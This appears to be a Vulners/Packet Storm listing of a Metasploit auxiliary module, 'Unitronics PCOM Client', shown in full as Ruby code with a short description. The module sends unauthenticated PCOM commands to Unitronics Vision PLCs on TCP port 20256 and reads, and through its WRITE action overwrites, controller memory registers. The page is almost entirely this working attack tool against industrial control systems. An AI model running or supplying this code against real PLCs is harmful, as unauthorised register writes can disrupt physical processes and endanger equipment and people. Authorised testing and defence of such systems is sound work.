Lucene search
K

Unitronics PCOM Client

🗓️ 31 Aug 2024 00:00:00 · Reported by Jay Turla, metasploit.com · Type
packetstorm
 packetstorm
🔗 packetstormsecurity.com · 👁 157 Views

The Unitronics PCOM Client module sends unauthenticated PCOM commands to query PLC registers. It includes actions to read and write PLC memory values.

Code
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
  
# Declare the module metadata (name, description, author, reference, the READ
# and WRITE actions with READ as the default) and register the options read
# elsewhere in this module: RPORT, UNITID, ADDRESS, LENGTH, VALUES and OPERAND.
#
# @param info [Hash] metadata handed to update_info
def initialize(info = {})
  # The blanks and newlines are part of the literal's value, so they are
  # spelled out explicitly rather than left to the source layout.
  description = "  \nUnitronics Vision PLCs allow unauthenticated PCOM commands  \nto query PLC registers.  \n"
  pcom_spec_url = 'https://unitronicsplc.com/Download/SoftwareUtilities/Unitronics%20PCOM%20Protocol.pdf'
  operand_types = %w[Input Output SB MB MI SI ML SL SDW MDW]

  super(
    update_info(
      info,
      'Name' => 'Unitronics PCOM Client',
      'Description' => description,
      'Author' => ['Luis Rosa <lmrosa[at]dei.uc.pt>'],
      'License' => MSF_LICENSE,
      'References' => [
        ['URL', pcom_spec_url]
      ],
      'Actions' => [
        ['READ', { 'Description' => 'Read values from PLC memory' }],
        ['WRITE', { 'Description' => 'Write values to PLC memory' }]
      ],
      'DefaultAction' => 'READ'
    )
  )

  register_options(
    [
      Opt::RPORT(20256),
      OptInt.new('UNITID', [false, 'Unit ID (0 - 127)', 0]),
      OptInt.new('ADDRESS', [true, 'PCOM memory address (0 - 65535)', 0]),
      OptInt.new('LENGTH', [true, 'Number of values to read (1 - 255) (read only)', 3]),
      OptString.new('VALUES', [false, 'Values to write (0 - 65535 each) (comma separated) (write only)']),
      OptEnum.new('OPERAND', [true, 'Operand type', 'MI', operand_types])
    ]
  )
end
  
# Compute the checksum of a PCOM ASCII message.
#
# The checksum is the sum of the message bytes modulo 256, rendered as two
# upper-case hexadecimal characters.
#
# @param msg [String] the bytes to checksum
# @return [String] two upper-case hex characters ("00" for an empty message)
def pcom_ascii_checksum(msg)
  # bytes.sum is 0 for an empty string; inject(:+) would yield nil and make
  # the modulo raise.
  (msg.bytes.sum % 256).to_s(16).upcase.rjust(2, '0')
end
  
# Encode the size of a PCOM ASCII payload for the PCOM/TCP header.
#
# @param pcom_ascii [String] the PCOM ASCII payload
# @return [String] the payload size in bytes as a 2-byte little-endian
#   binary string (only the low 16 bits of the size are kept)
def pcom_ascii_len(pcom_ascii)
  # 'v' packs an unsigned 16-bit little-endian integer: low byte first.
  # bytesize is used because the value describes bytes on the wire.
  [pcom_ascii.bytesize].pack('v')
end
  
# Build a complete PCOM/TCP request carrying one PCOM ASCII command.
#
# The result is, in order: two random hex characters (transaction id), the
# byte 0x65 (ascii mode, 101), a reserved 0x00 byte, the payload length as
# returned by pcom_ascii_len, and the payload itself. The payload is
# "/" + unit id + command + checksum + "\r", where the checksum covers the
# unit id and the command.
#
# @param command [String] command code followed by its arguments
# @return [String] the request bytes to put on the socket
def pcom_ascii_request(command)
  # UNITID is registered as an optional option, so it may be unset; nil.to_i
  # is 0, which matches the option's default unit.
  unit_id = datastore['UNITID'].to_i.to_s(16).rjust(2, '0')
  # NOTE(review): the unit id is rendered in lower-case hex while the checksum
  # is upper-case — confirm the PLC accepts both for ids above 9.

  # PCOM/ASCII
  payload = "/#{unit_id}#{command}#{pcom_ascii_checksum(unit_id + command)}\r"

  # PCOM/TCP header: transaction id, ascii mode (101), reserved byte
  header = "#{Rex::Text.rand_text_hex(2)}\x65\x00"

  header + pcom_ascii_len(payload) + payload
end
  
# Send a PCOM read command for LENGTH values of type OPERAND starting at
# ADDRESS and return the raw reply.
#
# The command is the operand's read code followed by the address as four hex
# digits and the count as two hex digits.
#
# @return [String, nil] whatever sock.get_once returns, or nil when an option
#   is rejected (an error is printed in that case and nothing is sent)
def read
  address = datastore['ADDRESS']
  count = datastore['LENGTH']

  # The count is sent as two hex digits, so it must fit the documented 1 - 255.
  unless (1..255).cover?(count)
    print_error("Invalid LENGTH")
    return
  end

  # The last value read sits at ADDRESS + LENGTH - 1; that is the address
  # which has to stay within 0 - 65535.
  unless (0..65535).cover?(address) && address + count - 1 <= 65535
    print_error("Invalid ADDRESS")
    return
  end

  cc = {
    'Input' => 'RE', 'Output' => 'RA', 'SB' => 'GS', 'MB' => 'RB', 'MI' => 'RW',
    'SI' => 'GF', 'ML' => 'RNL', 'SL' => 'RNH', 'SDW' => 'RNJ', 'MDW' => 'RND'
  }[datastore['OPERAND']]
  unless cc
    print_error("Unknown operand #{datastore['OPERAND']}")
    return
  end

  # Report count and address in decimal, the way the options are entered.
  print_status("Reading #{count} values (#{datastore['OPERAND']}) starting from #{address} address")
  sock.put(pcom_ascii_request(cc + address.to_s(16).rjust(4, '0') + count.to_s(16).rjust(2, '0')))
  sock.get_once
end
  
# Print the values contained in a read answer, one line per value.
#
# The first two characters of the answer select how many hex characters make
# up one value: 1 for RE, RA, RB and GS, 4 for RW and GF, 8 for RN. Each value
# is printed in decimal next to its address, counting up from ADDRESS.
#
# @param ans [String] answer beginning with the two-character command code
# @return [Array<String>, nil] the hex chunks that were printed, or nil when
#   the command code is not recognised
def print_read_ans(ans)
  code = ans[0..1]
  payload = ans[2..-1]
  first_address = datastore['ADDRESS']

  chars_per_value = {
    'RE' => 1, 'RA' => 1, 'RB' => 1, 'GS' => 1,
    'RW' => 4, 'GF' => 4,
    'RN' => 8
  }[code]

  if chars_per_value.nil?
    print_error("Unknown answer #{code}")
    return
  end

  payload.scan(/.{#{chars_per_value}}/).each_with_index do |chunk, offset|
    label = (first_address + offset).to_s.rjust(5, '0')
    print_good("[#{label}] : #{chunk.to_i(16)}")
  end
end
  
# Send a PCOM write command storing VALUES into OPERAND registers starting at
# ADDRESS and return the raw reply.
#
# The command is the operand's write code followed by the address as four hex
# digits, the number of values as two hex digits, and the values themselves.
# Each value is encoded with the number of hex characters print_read_ans uses
# when decoding the same operand family: 1 for bit operands, 4 for MI/SI and
# 8 for ML/SL/SDW/MDW.
# NOTE(review): value widths follow the read path — confirm against the PCOM
# protocol document.
#
# @return [String, nil] whatever sock.get_once returns, or nil when an option
#   is rejected (an error is printed in that case and nothing is sent)
def write
  operand = datastore['OPERAND']
  if operand == 'Input'
    print_error("Input operand is read only")
    return
  end

  # write command code and hex characters per value
  cc, width = {
    'Output' => ['SA', 1], 'SB' => ['SS', 1], 'MB' => ['SB', 1],
    'MI' => ['SW', 4], 'SI' => ['SF', 4],
    'ML' => ['SNL', 8], 'SL' => ['SNH', 8], 'SDW' => ['SNJ', 8], 'MDW' => ['SND', 8]
  }[operand]
  unless cc
    print_error("Unknown operand #{operand}")
    return
  end

  tokens = datastore['VALUES'].to_s.split(',').map(&:strip)
  if tokens.empty?
    print_error("The option VALUES is not set")
    return
  end

  # Only unsigned decimal values that fit the operand's width can be framed;
  # the count itself has to fit two hex digits.
  largest = width == 1 ? 1 : (16**width) - 1
  values = tokens.map { |token| token.match?(/\A\d+\z/) ? token.to_i : nil }
  unless values.length <= 255 && values.all? { |value| value && value <= largest }
    print_error("Invalid VALUES")
    return
  end

  # The last value written sits at ADDRESS + count - 1.
  address = datastore['ADDRESS']
  unless (0..65535).cover?(address) && address + values.length - 1 <= 65535
    print_error("Invalid ADDRESS")
    return
  end

  encoded = values.map { |value| value.to_s(16).rjust(width, '0') }.join
  # Report count and address in decimal, the way the options are entered.
  print_status("Writing #{values.length} #{operand} (#{datastore['VALUES']}) starting from #{address} address")
  sock.put(pcom_ascii_request(cc + address.to_s(16).rjust(4, '0') + values.length.to_s(16).rjust(2, '0') + encoded))
  sock.get_once
end
  
# Module entry point: connect, perform the selected action, and disconnect.
#
# READ sends a read request and prints the decoded values; WRITE sends a write
# request. Missing options, a missing reply and a truncated reply are reported
# with print_error.
def run
  connect
  case action.name
  when "READ"
    if datastore['LENGTH'].nil?
      print_error("The option LENGTH is not set")
      return
    end

    ans = read
    if ans.nil?
      print_error("No answer from PLC")
      return
    end

    # Keep what lies between the first 10 and the last 3 bytes of the reply.
    # NOTE(review): presumably the PCOM/TCP header plus reply prefix, and the
    # trailing checksum and terminator — confirm against the protocol document.
    raw = ans.to_s
    body = raw[10..(raw.length - 4)]
    if body.nil?
      # The slice is nil when the reply is shorter than the 10 skipped bytes.
      print_error("Malformed answer from PLC")
      return
    end
    print_read_ans(body)
  when "WRITE"
    if datastore['VALUES'].nil?
      print_error("The option VALUES is not set")
      return
    end

    print_error("No answer from PLC") if write.nil?
  else
    print_error("Unknown action #{action.name}")
  end
ensure
  # Close the connection on every exit path, including the early returns.
  disconnect
end
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation